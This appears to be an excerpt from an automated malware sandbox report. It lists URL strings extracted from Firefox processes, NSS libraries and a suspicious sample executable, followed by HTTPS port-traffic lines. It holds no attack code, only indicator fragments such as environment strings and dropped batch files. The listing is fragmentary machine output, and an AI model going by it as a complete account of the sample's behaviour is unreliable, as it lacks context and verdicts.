Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr	String found in binary or memory: https://mozilla.org0/
Source: firefox.exe, 00000016.00000003.3066184197.000001893379A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2990608782.000001893377C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 00000016.00000003.3253058406.00000189372BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://play.hbomax.com/page/
Source: firefox.exe, 00000016.00000003.3253058406.00000189372BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://play.hbomax.com/player/
Source: firefox.exe, 00000016.00000003.3066184197.000001893379A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2990608782.000001893377C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000016.00000003.3066594596.000001893378B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2990608782.000001893377C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
Source: firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://probeinfo.telemetry.mozilla.org/glean/repositories.
Source: firefox.exe, 00000016.00000003.3066712710.0000018933768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.firefox.com/
Source: firefox.exe, 00000016.00000003.3355751970.00000189451FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://redirector.gvt1.com
Source: firefox.exe, 00000016.00000003.3355751970.00000189451FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://redirector.gvt1.com/
Source: firefox.exe, 00000016.00000003.3365196247.000001894178C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3356133176.00000189451E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2557.0-linux-x64.zip
Source: firefox.exe, 00000016.00000003.3365196247.000001894178C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3356133176.00000189451E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2557.0-mac-arm64.zip
Source: firefox.exe, 00000016.00000003.3365196247.000001894178C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3356133176.00000189451E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2557.0-mac-x64.zip
Source: firefox.exe, 00000016.00000003.3365196247.000001894178C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3356133176.00000189451E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2557.0-win-arm64.zip
Source: firefox.exe, 00000016.00000003.3357377046.00000189447C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3365196247.000001894178C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3356133176.00000189451E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2557.0-win-x64.zip
Source: firefox.exe, 00000016.00000003.3365196247.000001894178C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3356133176.00000189451E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2557.0-win-x86.zip
Source: firefox.exe, 00000016.00000003.2988324990.00000189337C0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3066184197.00000189337AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 00000016.00000003.2831875013.0000018935307000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 00000016.00000003.3064660496.0000018936231000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon
Source: firefox.exe, 00000016.00000003.3357377046.0000018944747000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com
Source: firefox.exe, 00000016.00000003.3365196247.000001894178C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/
Source: firefox.exe, 00000016.00000003.3365699653.000001893FFE1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3253863845.0000018937281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 00000016.00000003.3253863845.0000018937281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 00000016.00000003.2986716743.0000018935C23000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3243875790.0000018945932000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3253256201.00000189372AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 00000016.00000003.2986716743.0000018935C23000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3243875790.0000018945932000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3253256201.00000189372AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 00000016.00000003.3364227569.0000018941B96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 00000016.00000003.3364227569.0000018941B96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 00000016.00000003.3359286606.0000018944562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 00000016.00000003.3358984869.00000189445B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/spocs#
Source: firefox.exe, 00000016.00000003.3358984869.00000189445B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/spocs#l
Source: firefox.exe, 00000016.00000003.3253058406.00000189372BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/spocs:
Source: firefox.exe, 00000016.00000003.3253256201.00000189372AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 00000016.00000003.3253256201.00000189372AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: JKJDHDBKEBGHJJJJKEHDHJJEGH.11.dr	String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 00000016.00000003.3237228102.000001894493B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-def
Source: firefox.exe, 00000016.00000003.3237228102.000001894493B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3247725111.0000018945FEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=spotlight
Source: firefox.exe, 00000016.00000003.3052251942.00000189379E2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3065918902.0000018935054000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2971003570.00000189379E2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3162423030.00000189379E2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2886717838.00000189379E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 00000016.00000003.3361812071.0000018941BD4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3364837586.00000189417D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: JKJDHDBKEBGHJJJJKEHDHJJEGH.11.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 00000016.00000003.2979236204.00000189388DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windows
Source: firefox.exe, 00000016.00000003.3243875790.0000018945979000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3243875790.0000018945966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefox
Source: JKJDHDBKEBGHJJJJKEHDHJJEGH.11.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: firefox.exe, 00000016.00000003.2979236204.00000189388DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 00000016.00000003.2979236204.00000189388DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 00000016.00000003.2979236204.00000189388DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 00000016.00000003.2979236204.00000189388DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 00000016.00000003.3066184197.00000189337DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2988020236.00000189337DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 00000016.00000003.3364719178.0000018941B74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: firefox.exe, 00000016.00000003.3359286606.0000018944562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://watch.sling.com/
Source: firefox.exe, 00000016.00000003.3234505370.000001894487D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://weibo.com/
Source: firefox.exe, 00000016.00000003.3231288925.0000018944623000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: firefox.exe, 00000016.00000003.3234505370.000001894487D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.co.uk/
Source: firefox.exe, 00000016.00000003.3364719178.0000018941B74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/
Source: bfb8bb0dc7.exe, 0000000B.00000002.3110870483.0000000022A6B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2993742632.0000018932761000.00000004.00000800.00020000.00000000.sdmp, prefs-1.js.22.dr, JEHIJDGIEBKKFHJKJKEG.11.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: firefox.exe, 00000016.00000003.3252634014.00000189372C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2831875013.0000018935307000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 00000016.00000003.3426978382.0000018948100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3397921737.00000189470CB000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: bfb8bb0dc7.exe, 0000000B.00000002.3112755624.0000000022C00000.00000004.00000020.00020000.00000000.sdmp, BGCAFHCA.11.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: firefox.exe, 00000016.00000003.3357377046.00000189447C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: firefox.exe, 00000016.00000003.3165953939.0000018937989000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/
Source: firefox.exe, 00000016.00000003.2840438082.000001893534A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2826493925.0000018935100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2835272663.0000018935329000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2831875013.0000018935307000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: BGCAFHCA.11.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 00000016.00000003.3357377046.00000189447C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2826493925.0000018935100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3253058406.00000189372BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2835272663.0000018935329000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2831875013.0000018935307000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000016.00000003.3266971339.0000018946032000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: firefox.exe, 00000016.00000003.3253058406.00000189372BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.hulu.com/watch/
Source: firefox.exe, 00000016.00000003.3253058406.00000189372BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.instagram.com/
Source: firefox.exe, 00000016.00000003.3234505370.000001894487D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 00000016.00000003.3165953939.0000018937995000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3056415593.0000018937995000.00000004.00000800.00020000.00000000.sdmp, JKJDHDBKEBGHJJJJKEHDHJJEGH.11.dr	String found in binary or memory: https://www.mozilla.org
Source: JKJDHDBKEBGHJJJJKEHDHJJEGH.11.dr	String found in binary or memory: https://www.mozilla.org#
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp, firefox.exe, 00000016.00000003.3243875790.0000018945979000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3243875790.0000018945966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: JKJDHDBKEBGHJJJJKEHDHJJEGH.11.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: firefox.exe, 00000016.00000003.3238318246.0000018944973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3238184718.0000018944981000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3253730463.0000018937288000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3236687144.000001894496F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3237228102.000001894493B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/about/xe
Source: firefox.exe, 00000016.00000003.3401318781.000001894708A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/anything/?
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp, firefox.exe, 00000016.00000003.3243875790.0000018945979000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3243875790.0000018945966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: JKJDHDBKEBGHJJJJKEHDHJJEGH.11.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: JKJDHDBKEBGHJJJJKEHDHJJEGH.11.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 00000016.00000003.3253863845.0000018937281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/mobile/get-app/?utm_medium=firefox-desktop&utm_source=onboarding-mod
Source: firefox.exe, 00000016.00000003.3358984869.00000189445B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-contentP
Source: firefox.exe, 00000016.00000003.3358984869.00000189445B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/V
Source: firefox.exe, 00000016.00000003.3061487609.0000018937842000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2883723523.00000189387A9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2969179512.00000189387A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com
Source: firefox.exe, 00000016.00000003.3364719178.0000018941B74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 00000016.00000003.3359286606.0000018944562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.sling.com/
Source: bfb8bb0dc7.exe, 0000000B.00000002.3110870483.0000000022A6B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2993742632.0000018932761000.00000004.00000800.00020000.00000000.sdmp, prefs-1.js.22.dr, JEHIJDGIEBKKFHJKJKEG.11.dr	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: firefox.exe, 00000016.00000003.3357377046.00000189447C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3162211301.0000018937D19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: firefox.exe, 00000016.00000003.3364719178.0000018941B74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 0000002B.00000002.3012524075.0000020633CB0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3015381995.0000020633FA4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3015863881.0000020634003000.00000004.00000800.00020000.00000000.sdmp, 4B78.bat.37.dr, F1CF.bat.12.dr	String found in binary or memory: https://www.youtube.com/account
Source: firefox.exe, 00000013.00000002.2813219119.000001729F300000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account--attempting-deelevation
Source: firefox.exe, 0000002B.00000002.3012524075.0000020633CB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountC:
Source: firefox.exe, 0000002A.00000002.3012330529.00000197D9F19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountJ
Source: firefox.exe, 0000002B.00000002.3015090796.0000020633E70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:
Source: firefox.exe, 0000002B.00000002.3015090796.0000020633E70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountNUMB
Source: firefox.exe, 0000002B.00000002.3012524075.0000020633CB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountO
Source: firefox.exe, 0000002B.00000002.3015090796.0000020633E70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountUSERDO
Source: firefox.exe, 00000011.00000002.2786986644.00000271F8EA8000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002A.00000002.3013910159.00000197DA1B0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002A.00000002.3012330529.00000197D9F10000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002A.00000002.3013910159.00000197DA1B4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3015090796.0000020633E70000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3012524075.0000020633CB0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3015381995.0000020633FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=e
Source: firefox.exe, 0000002B.00000002.3012524075.0000020633CBA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountr
Source: firefox.exe, 00000011.00000002.2786986644.00000271F8E79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountwm
Source: firefox.exe, 00000016.00000003.3162211301.0000018937D19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.comweave:service:start-over
Source: firefox.exe, 00000016.00000003.2979236204.00000189388BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2979236204.00000189388DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning
Source: firefox.exe, 00000016.00000003.3171769627.00000189378A6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3061645341.00000189377B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com
Source: firefox.exe, 00000016.00000003.3063219803.000001893777D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3173454403.000001893777D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3073028344.00000189317DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2890156235.000001893777D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 63514 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59162 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59156 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63457 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58978
Source: unknown	Network traffic detected: HTTP traffic on port 59316 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58977
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58976
Source: unknown	Network traffic detected: HTTP traffic on port 59099 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59158
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59312
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59157
Source: unknown	Network traffic detected: HTTP traffic on port 59313 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63649
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59314
Source: unknown	Network traffic detected: HTTP traffic on port 59124 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59159
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63406
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59313
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59033
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59032
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59153
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58980
Source: unknown	Network traffic detected: HTTP traffic on port 59015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59156
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59034
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59155
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59152
Source: unknown	Network traffic detected: HTTP traffic on port 59082 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59101 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59159 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59331 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59319
Source: unknown	Network traffic detected: HTTP traffic on port 63460 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59316
Source: unknown	Network traffic detected: HTTP traffic on port 59130 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59315
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59318
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59317
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59169
Source: unknown	Network traffic detected: HTTP traffic on port 59087 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59165
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59167
Source: unknown	Network traffic detected: HTTP traffic on port 59165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59166
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59320
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59161
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59160
Source: unknown	Network traffic detected: HTTP traffic on port 58979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59163
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63652
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59162
Source: unknown	Network traffic detected: HTTP traffic on port 58996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63653
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63455 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59160 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63391
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63461 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58996
Source: unknown	Network traffic detected: HTTP traffic on port 59078 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59333
Source: unknown	Network traffic detected: HTTP traffic on port 59168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59332
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59331
Source: unknown	Network traffic detected: HTTP traffic on port 63653 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 59084 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 58976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59157 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63458 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59319 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59333 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59102
Source: unknown	Network traffic detected: HTTP traffic on port 59118 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59101
Source: unknown	Network traffic detected: HTTP traffic on port 59033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59100
Source: unknown	Network traffic detected: HTTP traffic on port 59081 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 63453 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59152 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59332 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59106
Source: unknown	Network traffic detected: HTTP traffic on port 63518 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59086 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59078
Source: unknown	Network traffic detected: HTTP traffic on port 59034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59166 -> 443
